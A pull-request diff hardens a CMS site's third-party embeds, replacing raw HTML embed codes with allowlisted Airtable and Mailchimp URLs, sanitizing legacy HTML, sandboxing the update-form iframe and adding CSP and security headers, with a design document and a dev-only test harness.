### PR TITLE
Secure CMS embeds and browser content policies

### DIFF
--- a/docs/security/embeds-and-csp.md
+++ b/docs/security/embeds-and-csp.md
@@ -1,0 +1,135 @@
+# CMS embeds and browser content policies
+
+This document describes the trust boundary between CMS-authored content
+and the browser: which third-party embeds are allowed, how they are
+constrained, and which security headers every response carries.
+
+The single source of truth for the embed allowlist is
+[`src/lib/security/embedPolicy.mjs`](../../src/lib/security/embedPolicy.mjs).
+The Content-Security-Policy in
+[`src/lib/security/headers.mjs`](../../src/lib/security/headers.mjs) is
+built from the same allowlist, so approving a new provider in one place
+updates both the runtime validation and the CSP.
+
+## Structured embed configuration
+
+CMS editors configure embeds with structured fields, not raw HTML:
+
+- **Promise updates** (`promise-updates` global): the `formUrl` field
+  takes the https URL of the Airtable shared form (e.g.
+  `https://airtable.com/embed/app…/shr…`). The legacy `embedCode` field
+  still accepts a plain Airtable `<iframe>` snippet, but only the `src`
+  URL is ever used — the HTML itself is never rendered — and the URL
+  must pass the iframe allowlist. Field-level validation rejects
+  scripts, inline event handlers, and non-allowlisted origins at save
+  time; `resolveUpdateFormUrl` rejects them again at render time.
+- **Newsletter** (site settings → Engagement tab): the `signupUrl`
+  field takes the Mailchimp form action URL (e.g.
+  `https://<account>.<dc>.list-manage.com/subscribe/post?u=…&id=…`).
+  The site renders its own first-party signup form (including
+  Mailchimp's anti-bot honeypot field) posting to that URL. The legacy
+  `embedCode` field remains as a fallback and is sanitized before
+  rendering (see below).
+
+## Allowlisted origins
+
+| Purpose | Provider | Hosts | CSP directive |
+| --- | --- | --- | --- |
+| Promise-update iframe | Airtable | `airtable.com` (exact) | `frame-src https://airtable.com` |
+| Newsletter form action | Mailchimp | `*.list-manage.com` (subdomains only) | `form-action https://*.list-manage.com` |
+
+Rules applied to every embed URL:
+
+- `https:` only; `http:`, `javascript:`, `data:` etc. are rejected.
+- Host matching is exact, or suffix-based for `*.` wildcard entries
+  (`us1.list-manage.com` matches, `evillist-manage.com` and bare
+  `list-manage.com` do not).
+
+To approve a new provider, add it to `embedPolicy.mjs` and record the
+decision here.
+
+## Legacy HTML sanitization
+
+Legacy newsletter embed HTML is sanitized server-side with
+`sanitize-html` ([`src/lib/embeds/sanitize.ts`](../../src/lib/embeds/sanitize.ts))
+before it reaches `dangerouslySetInnerHTML`:
+
+- **Scripts**: `<script>`, `<style>`, `<iframe>` and all other
+  non-allowlisted tags are removed.
+- **Event handlers**: only an explicit attribute allowlist survives, so
+  every `on*` attribute is stripped.
+- **Forms**: any `<form>` whose `action` is not on an approved
+  newsletter provider is removed entirely (with its children).
+  Non-allowlisted `input` types (e.g. `type="image"`) are removed.
+- **Unsafe URLs**: only `https:` and `mailto:` schemes are allowed;
+  protocol-relative URLs are rejected; links are forced to
+  `rel="noopener noreferrer"`.
+
+The promise-update path has no HTML sink at all: only a validated URL
+string crosses the server/client boundary.
+
+## Iframe constraints (promise-update dialog)
+
+The update form iframe
+([`src/components/ActNowCard/UpdateDialog.tsx`](../../src/components/ActNowCard/UpdateDialog.tsx))
+re-validates its `src` against the allowlist before rendering and is
+constrained to the minimum capabilities Airtable's shared forms need:
+
+| `sandbox` token | Why it is needed |
+| --- | --- |
+| `allow-scripts` | The Airtable form is a JavaScript application. |
+| `allow-forms` | Submitting the form. |
+| `allow-same-origin` | The form needs its own (airtable.com) origin for storage/XHR. Safe because `src` can never be a same-origin URL — only allowlisted third-party hosts pass validation. |
+| `allow-popups`, `allow-popups-to-escape-sandbox` | Links inside the form open in a new tab. |
+
+Deliberately **not** granted: `allow-top-navigation`,
+`allow-downloads`, `allow-modals`, `allow-pointer-lock`,
+`allow-presentation`. The `allow` attribute additionally denies
+camera, microphone, geolocation, payment, and fullscreen, and
+`referrerpolicy="strict-origin-when-cross-origin"` limits referrer
+leakage.
+
+## Security headers
+
+Applied to every route via `headers()` in
+[`next.config.mjs`](../../next.config.mjs):
+
+| Header | Value (production) |
+| --- | --- |
+| `Content-Security-Policy` | See below |
+| `X-Content-Type-Options` | `nosniff` |
+| `Referrer-Policy` | `strict-origin-when-cross-origin` |
+| `X-Frame-Options` | `SAMEORIGIN` (legacy fallback for `frame-ancestors`) |
+| `Permissions-Policy` | `camera=(), microphone=(), geolocation=(), payment=(), usb=(), interest-cohort=()` |
+| `Strict-Transport-Security` | `max-age=63072000; includeSubDomains` (production only) |
+
+CSP directives and their rationale:
+
+| Directive | Sources | Why |
+| --- | --- | --- |
+| `default-src` | `'self'` | Deny-by-default baseline. |
+| `script-src` | `'self' 'unsafe-inline'` (+ `'unsafe-eval'` in dev) | Next.js bootstrap and Payload Admin inject inline scripts; React Refresh needs eval in development only. |
+| `style-src` | `'self' 'unsafe-inline'` | MUI/Emotion inject inline `<style>` tags at runtime. |
+| `img-src` / `media-src` | `'self' blob: data: https:` | Tenant media may be served from remote object storage/CDNs configured per deployment. |
+| `font-src` | `'self' data:` | Self-hosted fonts via `next/font`. |
+| `connect-src` | `'self' https://*.sentry.io` (+ `ws: wss:` in dev) | Payload API and the Sentry `/monitoring` tunnel are same-origin; direct Sentry ingest is the SDK fallback; websockets for HMR in dev. |
+| `worker-src` | `'self' blob:` | Sentry session replay / bundled workers. |
+| `frame-src` | `'self'` + approved iframe providers | Payload Admin live preview plus the promise-update embed. |
+| `form-action` | `'self'` + approved newsletter providers | First-party forms plus Mailchimp signup. |
+| `frame-ancestors` | `'self'` | The site must not be framed by other origins. |
+| `object-src` | `'none'` | No plugins. |
+| `base-uri` | `'self'` | Prevents `<base>` hijacking of relative URLs. |
+
+## Tests
+
+- `tests/int/embeds.int.spec.ts` — allowlist acceptance/rejection,
+  legacy-snippet validators, and sanitizer behaviour (scripts, event
+  handlers, unsafe URLs, unapproved form actions).
+- `tests/int/securityHeaders.int.spec.ts` — CSP directive and header
+  baseline assertions.
+- `tests/e2e/security.e2e.spec.ts` — response headers on a live
+  server, keyboard/screen-reader behaviour of the update dialog
+  (labelled `role="dialog"`, focus trapping, Escape, focus
+  restoration), sandbox attributes, and refusal to render a
+  non-allowlisted embed. Uses the development-only harness at
+  `/dev/update-dialog`.

--- a/next.config.mjs
+++ b/next.config.mjs
@@ -1,6 +1,8 @@
 import { withSentryConfig } from "@sentry/nextjs";
 import { withPayload } from "@payloadcms/next/withPayload";
 
+import { buildSecurityHeaders } from "./src/lib/security/headers.mjs";
+
 /** @type {import('next').NextConfig} */
 const nextConfig = {
   // Your Next.js config here
@@ -8,6 +10,16 @@ const nextConfig = {
     ignoreDuringBuilds: false,
   },
   output: "standalone",
+  async headers() {
+    return [
+      {
+        source: "/(.*)",
+        headers: buildSecurityHeaders({
+          isDev: process.env.NODE_ENV !== "production",
+        }),
+      },
+    ];
+  },
   webpack: (webpackConfig) => {
     webpackConfig.resolve.extensionAlias = {
       ".cjs": [".cts", ".cjs"],

--- a/package.json
+++ b/package.json
@@ -78,6 +78,7 @@
     "react-dom": "19.1.3",
     "react-share": "^5.2.2",
     "require-in-the-middle": "^7.5.2",
+    "sanitize-html": "^2.17.6",
     "sharp": "0.34.3",
     "tiktoken": "^1.0.22",
     "zod": "^4.3.6"
@@ -90,6 +91,7 @@
     "@types/node": "^24.3.0",
     "@types/react": "19.1.11",
     "@types/react-dom": "19.1.8",
+    "@types/sanitize-html": "^2.16.1",
     "@vitejs/plugin-react": "5.0.1",
     "airtable-ts-codegen": "^2.1.0",
     "eslint": "^9.34.0",

--- a/pnpm-lock.yaml
+++ b/pnpm-lock.yaml
@@ -173,6 +173,9 @@ importers:
       require-in-the-middle:
         specifier: ^7.5.2
         version: 7.5.2
+      sanitize-html:
+        specifier: ^2.17.6
+        version: 2.17.6
       sharp:
         specifier: 0.34.3
         version: 0.34.3
@@ -204,6 +207,9 @@ importers:
       '@types/react-dom':
         specifier: 19.1.8
         version: 19.1.8(@types/react@19.1.11)
+      '@types/sanitize-html':
+        specifier: ^2.16.1
+        version: 2.16.1
       '@vitejs/plugin-react':
         specifier: 5.0.1
         version: 5.0.1(vite@7.1.3(@types/node@24.3.0)(sass@1.77.4)(terser@5.46.1)(tsx@4.21.0))
@@ -3491,6 +3497,9 @@ packages:
   '@types/react@19.1.11':
     resolution: {integrity: sha512-lr3jdBw/BGj49Eps7EvqlUaoeA0xpj3pc0RoJkHpYaCHkVK7i28dKyImLQb3JVlqs3aYSXf7qYuWOW/fgZnTXQ==}
 
+  '@types/sanitize-html@2.16.1':
+    resolution: {integrity: sha512-n9wjs8bCOTyN/ynwD8s/nTcTreIHB1vf31vhLMGqUPNHaweKC4/fAl4Dj+hUlCTKYgm4P3k83fmiFfzkZ6sgMA==}
+
   '@types/shimmer@1.2.0':
     resolution: {integrity: sha512-UE7oxhQLLd9gub6JKIAhDq06T0F6FnztwMNRvYgjeQSBeMc1ZG/tA47EwfduvkuQS8apbkM/lpLpWsaCeYsXVg==}
 
@@ -4352,15 +4361,31 @@ packages:
   dom-serializer@2.0.0:
     resolution: {integrity: sha512-wIkAryiqt/nV5EQKqQpo3SToSOV9J0DnbJqwK7Wv/Trc92zIAYZ4FlMu+JPFW1DfGFt81ZTCGgDEabffXeLyJg==}
 
+  dom-serializer@3.1.1:
+    resolution: {integrity: sha512-4MEa38/QexBob6gFNwu+EGdWvhJ1OKuNwdYY3Y3NyeWDQfnGeDYQUDfIRzWu5B5gsv03so2Uxd28YC6zrsx3Lw==}
+    engines: {node: '>=20.19.0'}
+
   domelementtype@2.3.0:
     resolution: {integrity: sha512-OLETBj6w0OsagBwdXnPdN0cnMfF9opN69co+7ZrbfPGrdpPVNBUj02spi6B1N7wChLQiPn4CSH/zJvXw56gmHw==}
+
+  domelementtype@3.0.0:
+    resolution: {integrity: sha512-umCQid3jKbDmVjx8jGaW7uUykm4DEUeyV21hPxNMo2nV955DhUThwqyOIDtreepP31hl84X7G5U9ZfsWvIB3Pg==}
+    engines: {node: '>=20.19.0'}
 
   domhandler@5.0.3:
     resolution: {integrity: sha512-cgwlv/1iFQiFnU96XXgROh8xTeetsnJiDsTc7TYCLFd9+/WNkIqPTxiM/8pSd8VIrhXGTf1Ny1q1hquVqDJB5w==}
     engines: {node: '>= 4'}
 
+  domhandler@6.0.1:
+    resolution: {integrity: sha512-gYzvtM72ZtxQO0T048kd6HWSbbGCNOUwcnfQ01cqIJ4X2IYKFFHZ5mKvrQETcFXxsRObZulDaKmy//R7TPtsBg==}
+    engines: {node: '>=20.19.0'}
+
   domutils@3.2.2:
     resolution: {integrity: sha512-6kZKyUajlDuqlHKVX1w7gyslj9MPIXzIFiz/rGu35uC1wMi+kMhQwGhl4lt9unC9Vb9INnY9Z3/ZA3+FhASLaw==}
+
+  domutils@4.0.2:
+    resolution: {integrity: sha512-qI4JLRKnSzqFqr7hAlS5xQDusBCjKSEG4t4+7aNrIQMHBcsC2TGEhuyABJdYkgSewL57PNLYEiibY2iPKhKpaA==}
+    engines: {node: '>=20.19.0'}
 
   dot-case@3.0.4:
     resolution: {integrity: sha512-Kv5nKlh6yRrdrGvxeJ2e5y2eRUpkUosIW4A2AS38zwSz27zu7ufDwQPi5Jhs3XAlGNetl3bmnGhQsMtkKJnj3w==}
@@ -4403,6 +4428,14 @@ packages:
   entities@6.0.1:
     resolution: {integrity: sha512-aN97NXWF6AWBTahfVOIrB/NShkzi5H7F9r1s9mD3cDj4Ko5f2qhhVoYMibXF7GlLveb/D2ioWay8lxI97Ven3g==}
     engines: {node: '>=0.12'}
+
+  entities@7.0.1:
+    resolution: {integrity: sha512-TWrgLOFUQTH994YUyl1yT4uyavY5nNB5muff+RtWaqNVCAK408b5ZnnbNAUEWLTCpum9w6arT70i1XdQ4UeOPA==}
+    engines: {node: '>=0.12'}
+
+  entities@8.0.0:
+    resolution: {integrity: sha512-zwfzJecQ/Uej6tusMqwAqU/6KL2XaB2VZ2Jg54Je6ahNBGNH6Ek6g3jjNCF0fG9EWQKGZNddNjU5F1ZQn/sBnA==}
+    engines: {node: '>=20.19.0'}
 
   error-ex@1.3.2:
     resolution: {integrity: sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==}
@@ -4870,6 +4903,13 @@ packages:
     resolution: {integrity: sha512-Y22oTqIU4uuPgEemfz7NDJz6OeKf12Lsu+QC+s3BVpda64lTiMYCyGwg5ki4vFxkMwQdeZDl2adZoqUgdFuTgQ==}
     engines: {node: '>=18'}
 
+  htmlparser2@10.1.0:
+    resolution: {integrity: sha512-VTZkM9GWRAtEpveh7MSF6SjjrpNVNNVJfFup7xTY3UpFtm67foy9HDVXneLtFVt4pMz5kZtgNcvCniNFb1hlEQ==}
+
+  htmlparser2@12.0.0:
+    resolution: {integrity: sha512-Tz7u1i95/g2x2jz81+x0FBVhBhY5aRTvD3tXXdFaljuNdzDLJ8UGNRrTcj2cgQvAg3iW/h77Fz15nLW0L0CrZw==}
+    engines: {node: '>=20.19.0'}
+
   http-proxy-agent@7.0.2:
     resolution: {integrity: sha512-T1gkAiYYDWYx3V5Bmyu7HcfcvL7mUrTWiM6yOfa3PIphViJ/gFPbvidQ+veqSOHci/PxBcDabeUNCzpOODJZig==}
     engines: {node: '>= 14'}
@@ -5025,6 +5065,10 @@ packages:
   is-number@7.0.0:
     resolution: {integrity: sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==}
     engines: {node: '>=0.12.0'}
+
+  is-plain-object@5.0.0:
+    resolution: {integrity: sha512-VRSzKkbMm5jMDoKLbltAkFQ5Qr7VDiTFGXxYFXXowVj387GeGNOCsOH6Msy00SGZ3Fp84b1Naa1psqgcCIEP5Q==}
+    engines: {node: '>=0.10.0'}
 
   is-potential-custom-element-name@1.0.1:
     resolution: {integrity: sha512-bCYeRA2rVibKZd+s2625gGnGF/t7DSqDs4dP7CrLA1m7jKWz6pps0LpYLJN8Q64HtmPKJ1hrN3nzPNKFEKOUiQ==}
@@ -5198,6 +5242,9 @@ packages:
   language-tags@1.0.9:
     resolution: {integrity: sha512-MbjN408fEndfiQXbFQ1vnd+1NoLDsnQW41410oQBXiyXDMYH5z505juWa4KUE1LqxRC7DgOgZDbKLxHIwm27hA==}
     engines: {node: '>=0.10'}
+
+  launder@1.7.1:
+    resolution: {integrity: sha512-mU6WRz5EusL9ZZuiZ5SO4Y6C0P9PAUR9iwdb6bzj4KDihm28DiHFw+/yk9DBH4f+Pv1wuzQ4e2jV3oQ7mkIqvw==}
 
   levn@0.4.1:
     resolution: {integrity: sha512-+bT2uH4E5LGE7h/n3evcS/sQlJXCpIp6ym8OWJ5eV6+67Dsql/LaaT7qJBAt2rzfoa/5QBGBhxDix1dMt2kQKQ==}
@@ -5619,6 +5666,9 @@ packages:
     resolution: {integrity: sha512-1Y1A//QUXEZK7YKz+rD9WydcE1+EuPr6ZBgKecAB8tmoW6UFv0NREVJe1p+jRxtThkcbbKkfwIbWJe/IeE6m2Q==}
     engines: {node: '>=0.10.0'}
 
+  parse-srcset@1.0.2:
+    resolution: {integrity: sha512-/2qh0lav6CmI15FzA3i/2Bzk2zCgQhGMkvhOhKNcBVQ1ldgpbfiNTVslmooUmWJcADi1f1kIeynbDRVzNlfR6Q==}
+
   parse5@7.3.0:
     resolution: {integrity: sha512-IInvU7fabl34qmi9gY8XOVxhYyMyuH2xUNpb2q8/Y+7552KlejkRvqvD19nMoUW/uQGGbqNpA6Tufu5FL5BZgw==}
 
@@ -5979,6 +6029,10 @@ packages:
 
   sanitize-filename@1.6.3:
     resolution: {integrity: sha512-y/52Mcy7aw3gRm7IrcGDFx/bCk4AhRh2eI9luHOQM86nZsqwiRkkq2GekHXBBD+SmPidc8i2PqtYZl+pWJ8Oeg==}
+
+  sanitize-html@2.17.6:
+    resolution: {integrity: sha512-M4bo9tfv1yfhQZZKkc6dL07ALrGJtfvNOuhX3hU9AVPR/uPQ+nKOJBqTYc7LfMQblTW04mtSWDJWEyLvygJsLA==}
+    engines: {node: '>=22.12.0'}
 
   sass@1.77.4:
     resolution: {integrity: sha512-vcF3Ckow6g939GMA4PeU7b2K/9FALXk2KF9J87txdHzXbUF9XRQRwSxcAs/fGaTnJeBFd7UoV22j3lzMLdM0Pw==}
@@ -11027,6 +11081,10 @@ snapshots:
     dependencies:
       csstype: 3.1.3
 
+  '@types/sanitize-html@2.16.1':
+    dependencies:
+      htmlparser2: 10.1.0
+
   '@types/shimmer@1.2.0': {}
 
   '@types/tedious@4.0.14':
@@ -11953,17 +12011,35 @@ snapshots:
       domhandler: 5.0.3
       entities: 4.5.0
 
+  dom-serializer@3.1.1:
+    dependencies:
+      domelementtype: 3.0.0
+      domhandler: 6.0.1
+      entities: 8.0.0
+
   domelementtype@2.3.0: {}
+
+  domelementtype@3.0.0: {}
 
   domhandler@5.0.3:
     dependencies:
       domelementtype: 2.3.0
+
+  domhandler@6.0.1:
+    dependencies:
+      domelementtype: 3.0.0
 
   domutils@3.2.2:
     dependencies:
       dom-serializer: 2.0.0
       domelementtype: 2.3.0
       domhandler: 5.0.3
+
+  domutils@4.0.2:
+    dependencies:
+      dom-serializer: 3.1.1
+      domelementtype: 3.0.0
+      domhandler: 6.0.1
 
   dot-case@3.0.4:
     dependencies:
@@ -12000,6 +12076,10 @@ snapshots:
   entities@4.5.0: {}
 
   entities@6.0.1: {}
+
+  entities@7.0.1: {}
+
+  entities@8.0.0: {}
 
   error-ex@1.3.2:
     dependencies:
@@ -12653,6 +12733,20 @@ snapshots:
     dependencies:
       whatwg-encoding: 3.1.1
 
+  htmlparser2@10.1.0:
+    dependencies:
+      domelementtype: 2.3.0
+      domhandler: 5.0.3
+      domutils: 3.2.2
+      entities: 7.0.1
+
+  htmlparser2@12.0.0:
+    dependencies:
+      domelementtype: 3.0.0
+      domhandler: 6.0.1
+      domutils: 4.0.2
+      entities: 8.0.0
+
   http-proxy-agent@7.0.2:
     dependencies:
       agent-base: 7.1.4
@@ -12808,6 +12902,8 @@ snapshots:
       has-tostringtag: 1.0.2
 
   is-number@7.0.0: {}
+
+  is-plain-object@5.0.0: {}
 
   is-potential-custom-element-name@1.0.1: {}
 
@@ -12993,6 +13089,10 @@ snapshots:
   language-tags@1.0.9:
     dependencies:
       language-subtag-registry: 0.3.23
+
+  launder@1.7.1:
+    dependencies:
+      dayjs: 1.11.13
 
   levn@0.4.1:
     dependencies:
@@ -13531,6 +13631,8 @@ snapshots:
 
   parse-passwd@1.0.0: {}
 
+  parse-srcset@1.0.2: {}
+
   parse5@7.3.0:
     dependencies:
       entities: 6.0.1
@@ -13961,6 +14063,16 @@ snapshots:
   sanitize-filename@1.6.3:
     dependencies:
       truncate-utf8-bytes: 1.0.2
+
+  sanitize-html@2.17.6:
+    dependencies:
+      deepmerge: 4.3.1
+      escape-string-regexp: 4.0.0
+      htmlparser2: 12.0.0
+      is-plain-object: 5.0.0
+      launder: 1.7.1
+      parse-srcset: 1.0.2
+      postcss: 8.5.8
 
   sass@1.77.4:
     dependencies:

--- a/src/app/(frontend)/[entitySlug]/promises/[promiseId]/page.tsx
+++ b/src/app/(frontend)/[entitySlug]/promises/[promiseId]/page.tsx
@@ -21,6 +21,10 @@ import { getPromiseById } from "@/lib/data/promises";
 import { resolveMedia } from "@/lib/data/media";
 import { getPromiseUpdateEmbed } from "@/lib/data/promiseUpdates";
 import {
+  resolveUpdateFormUrl,
+  withUpdateFormPrefill,
+} from "@/lib/embeds/validation";
+import {
   buildSeoMetadata,
   getEntitySeo,
   composeTitleSegments,
@@ -35,82 +39,6 @@ import { resolveTenantLocale } from "@/utils/locales";
 
 const FALLBACK_STATUS_COLOR = "#909090";
 const FALLBACK_STATUS_TEXT_COLOR = "#202020";
-
-/**
- * Prefill Airtable embed with Promise(title), CheckMedia Link(url), Date(update date)
- * - injects query params into iframe `src` safely; encodes spaces in keys
- * - formats date as `YYYY-MM-DD`; gracefully no-ops if values missing
- */
-const prefillAirtableForm = (
-  embedCode: string,
-  promiseTitle?: string,
-  promiseUrl?: string,
-  updateDate?: string | Date,
-) => {
-  const hasAny = Boolean(
-    (promiseTitle && promiseTitle.trim()) ||
-      (promiseUrl && promiseUrl.trim()) ||
-      (updateDate && String(updateDate).trim()),
-  );
-
-  if (!hasAny) {
-    return embedCode;
-  }
-
-  return embedCode.replace(/src="([^"]+)"/, (match, src) => {
-    const formatDate = (value: string | Date | undefined) => {
-      if (!value) return null;
-      const d = new Date(value);
-      return Number.isNaN(d.getTime()) ? null : d.toISOString().slice(0, 10);
-    };
-
-    try {
-      const url = new URL(src);
-      if (promiseTitle && promiseTitle.trim()) {
-        url.searchParams.set("prefill_Promise", promiseTitle.trim());
-      }
-      if (promiseUrl && promiseUrl.trim()) {
-        url.searchParams.set("prefill_CheckMedia Link", promiseUrl.trim());
-        url.searchParams.set("hide_CheckMedia Link", "true");
-      }
-      const formattedDate = formatDate(updateDate);
-      if (formattedDate) {
-        url.searchParams.set("prefill_Date", formattedDate);
-      }
-      return `src="${url.toString()}"`;
-    } catch (error) {
-      const separator = src.includes("?") ? "&" : "?";
-      const params: string[] = [];
-      if (promiseTitle && promiseTitle.trim()) {
-        params.push(
-          `${encodeURIComponent("prefill_Promise")}=${encodeURIComponent(
-            promiseTitle.trim(),
-          )}`,
-        );
-      }
-      if (promiseUrl && promiseUrl.trim()) {
-        params.push(
-          `${encodeURIComponent("prefill_CheckMedia Link")}=${encodeURIComponent(
-            promiseUrl.trim(),
-          )}`,
-        );
-        params.push(
-          `${encodeURIComponent("hide_CheckMedia Link")}=${encodeURIComponent("true")}`,
-        );
-      }
-      const formattedDate = formatDate(updateDate);
-      if (formattedDate) {
-        params.push(
-          `${encodeURIComponent("prefill_Date")}=${encodeURIComponent(formattedDate)}`,
-        );
-      }
-      if (!params.length) {
-        return match;
-      }
-      return `src="${src}${separator}${params.join("&")}"`;
-    }
-  });
-};
 
 type Params = {
   entitySlug: string;
@@ -311,14 +239,16 @@ export default async function PromiseDetailPage({
   const titleText = promise.title?.trim() || "Promise";
   const promiseUpdateSettings = await getPromiseUpdateEmbed(locale);
   const siteSettings = await getTenantSiteSettings(tenant, locale);
-  const rawPromiseUpdateEmbed = promiseUpdateSettings?.embedCode ?? null;
-  const promiseUpdateEmbed = rawPromiseUpdateEmbed
-    ? prefillAirtableForm(
-        rawPromiseUpdateEmbed,
-        titleText,
+  // Resolve the update form URL from the structured CMS configuration
+  // (or a legacy iframe snippet) and reject anything outside the embed
+  // allowlist before it reaches the client.
+  const baseUpdateFormUrl = resolveUpdateFormUrl(promiseUpdateSettings);
+  const promiseUpdateFormUrl = baseUpdateFormUrl
+    ? withUpdateFormPrefill(baseUpdateFormUrl, {
+        promiseTitle: titleText,
         promiseUrl,
-        statusDate,
-      )
+        updateDate: statusDate,
+      })
     : null;
 
   const { actNow } = siteSettings || {};
@@ -399,7 +329,7 @@ export default async function PromiseDetailPage({
               <Box sx={{ mt: 2 }}>
                 <PromiseActions
                   share={actNow?.share ?? null}
-                  updateEmbed={promiseUpdateEmbed}
+                  updateFormUrl={promiseUpdateFormUrl}
                   updateLabel={promiseUpdateSettings?.updateLabel ?? null}
                 />
               </Box>

--- a/src/app/(frontend)/dev/update-dialog/UpdateDialogPreview.tsx
+++ b/src/app/(frontend)/dev/update-dialog/UpdateDialogPreview.tsx
@@ -1,0 +1,56 @@
+"use client";
+
+import { useState } from "react";
+import { Button, Container, Stack, Typography } from "@mui/material";
+
+import UpdateDialog from "@/components/ActNowCard/UpdateDialog";
+
+const ALLOWED_SRC = "https://airtable.com/embed/appPreview/shrPreview";
+const BLOCKED_SRC = "https://evil.example.com/embed/form";
+
+const UpdateDialogPreview = () => {
+  const [open, setOpen] = useState(false);
+  const [blockedOpen, setBlockedOpen] = useState(false);
+
+  return (
+    <Container sx={{ py: 8 }}>
+      <Stack spacing={2} alignItems="flex-start">
+        <Typography variant="h4" component="h1">
+          Update dialog preview
+        </Typography>
+        <Typography>
+          Development-only harness used by the Playwright security and
+          accessibility tests.
+        </Typography>
+        <Button
+          variant="contained"
+          data-testid="open-update-dialog"
+          onClick={() => setOpen(true)}
+        >
+          Open update form
+        </Button>
+        <Button
+          variant="outlined"
+          data-testid="open-blocked-dialog"
+          onClick={() => setBlockedOpen(true)}
+        >
+          Open blocked embed
+        </Button>
+      </Stack>
+      <UpdateDialog
+        open={open}
+        onClose={() => setOpen(false)}
+        src={ALLOWED_SRC}
+        title="Submit a promise update"
+      />
+      <UpdateDialog
+        open={blockedOpen}
+        onClose={() => setBlockedOpen(false)}
+        src={BLOCKED_SRC}
+        title="Blocked embed"
+      />
+    </Container>
+  );
+};
+
+export default UpdateDialogPreview;

--- a/src/app/(frontend)/dev/update-dialog/page.tsx
+++ b/src/app/(frontend)/dev/update-dialog/page.tsx
@@ -1,0 +1,15 @@
+import { notFound } from "next/navigation";
+
+import UpdateDialogPreview from "./UpdateDialogPreview";
+
+/**
+ * Development-only harness page used by the Playwright accessibility
+ * and embed-rejection tests (tests/e2e/security.e2e.spec.ts). Never
+ * available in production builds.
+ */
+export default function UpdateDialogPreviewPage() {
+  if (process.env.NODE_ENV === "production") {
+    notFound();
+  }
+  return <UpdateDialogPreview />;
+}

--- a/src/collections/SiteSettings/tabs/EngagementTab.ts
+++ b/src/collections/SiteSettings/tabs/EngagementTab.ts
@@ -1,6 +1,11 @@
 import { socialLinks } from "@/fields/socialLinks";
 import { Tab } from "payload";
 
+import {
+  validateNewsletterEmbedCodeField,
+  validateNewsletterSignupUrlField,
+} from "@/lib/embeds/validation";
+
 export const EngagementTab: Tab = {
   label: {
     en: "Engagement",
@@ -53,7 +58,7 @@ export const EngagementTab: Tab = {
       fields: [
         {
           type: "collapsible",
-          label: "Title & Embed Code",
+          label: "Title & Signup Form",
           fields: [
             {
               name: "title",
@@ -68,11 +73,40 @@ export const EngagementTab: Tab = {
               localized: true,
             },
             {
+              name: "signupUrl",
+              type: "text",
+              label: {
+                en: "Signup Form URL",
+                fr: "URL du formulaire d'inscription",
+              },
+              validate: (value: string | null | undefined) =>
+                validateNewsletterSignupUrlField(value),
+              admin: {
+                description: {
+                  en: "Preferred. The Mailchimp form action URL, e.g. https://example.us1.list-manage.com/subscribe/post?u=…&id=…. Only approved newsletter providers are accepted.",
+                  fr: "Recommandé. L'URL d'action du formulaire Mailchimp, p. ex. https://example.us1.list-manage.com/subscribe/post?u=…&id=…. Seuls les fournisseurs approuvés sont acceptés.",
+                },
+              },
+            },
+            {
               name: "embedCode",
               type: "code",
-              required: true,
+              label: {
+                en: "Embed Code (legacy)",
+                fr: "Code d'intégration (hérité)",
+              },
+              validate: (
+                value: string | null | undefined,
+                {
+                  siblingData,
+                }: { siblingData: Partial<{ signupUrl?: string | null }> },
+              ) => validateNewsletterEmbedCodeField(value, siblingData?.signupUrl),
               admin: {
                 language: "html",
+                description: {
+                  en: "Legacy. Sanitized before rendering: scripts, iframes, event handlers, and forms posting to unapproved providers are removed. Prefer the Signup Form URL field above.",
+                  fr: "Hérité. Assaini avant affichage : les scripts, iframes, gestionnaires d'événements et formulaires vers des fournisseurs non approuvés sont supprimés. Préférez le champ URL du formulaire ci-dessus.",
+                },
               },
             },
           ],

--- a/src/components/ActNowCard/UpdateDialog.tsx
+++ b/src/components/ActNowCard/UpdateDialog.tsx
@@ -1,99 +1,99 @@
-import { Box, Dialog, IconButton } from "@mui/material";
+"use client";
+
+import { useId } from "react";
+import {
+  Box,
+  Dialog,
+  DialogContent,
+  DialogTitle,
+  IconButton,
+} from "@mui/material";
 import CloseIcon from "@mui/icons-material/Close";
-import { useMemo } from "react";
+
+import { isAllowedIframeUrl } from "@/lib/security/embedPolicy.mjs";
+
+/**
+ * Sandbox capabilities granted to the embedded update form, kept to the
+ * minimum Airtable's shared forms need (documented in
+ * docs/security/embeds-and-csp.md):
+ * - allow-scripts: the form is a JavaScript application.
+ * - allow-forms: submitting the form.
+ * - allow-same-origin: the form needs access to its own (airtable.com)
+ *   origin for storage/XHR. It never matches this site's origin because
+ *   src is restricted to allowlisted third-party hosts.
+ * - allow-popups + allow-popups-to-escape-sandbox: links inside the
+ *   form open in a new tab.
+ * Deliberately NOT granted: top-navigation, downloads, modals,
+ * pointer-lock, presentation.
+ */
+const IFRAME_SANDBOX =
+  "allow-scripts allow-forms allow-same-origin allow-popups allow-popups-to-escape-sandbox";
+
+/** No powerful browser features are delegated to the embed. */
+const IFRAME_ALLOW =
+  "camera 'none'; microphone 'none'; geolocation 'none'; payment 'none'; fullscreen 'none'";
 
 type UpdateDialogProps = {
   open: boolean;
   onClose: () => void;
-  embedCode: string;
+  /** Validated https URL of the update form on an allowlisted provider. */
+  src: string;
+  /** Accessible dialog title, e.g. the CMS-configured update label. */
+  title?: string | null;
 };
 
-const UpdateDialog = ({ open, onClose, embedCode }: UpdateDialogProps) => {
-  const iframeSrc = useMemo(() => {
-    const match = embedCode.match(/<iframe[^>]*src=["']([^"']+)["']/i);
-    return match?.[1] ?? "";
-  }, [embedCode]);
+const UpdateDialog = ({ open, onClose, src, title }: UpdateDialogProps) => {
+  const titleId = useId();
+  const dialogTitle = title?.trim() || "Submit a promise update";
+
+  // Defense in depth: never render an iframe pointing outside the
+  // embed allowlist, even if a caller passes an unvalidated URL.
+  if (!isAllowedIframeUrl(src)) {
+    return null;
+  }
 
   return (
-    <>
-      <Dialog
-        open={open}
-        onClose={onClose}
-        scroll="body"
-        maxWidth="md"
-        fullWidth
-        keepMounted
-        disableAutoFocus
-        disableEnforceFocus
-        PaperProps={{
-          sx: {
-            display: "none",
-          },
+    <Dialog
+      open={open}
+      onClose={onClose}
+      aria-labelledby={titleId}
+      maxWidth="md"
+      fullWidth
+      scroll="body"
+    >
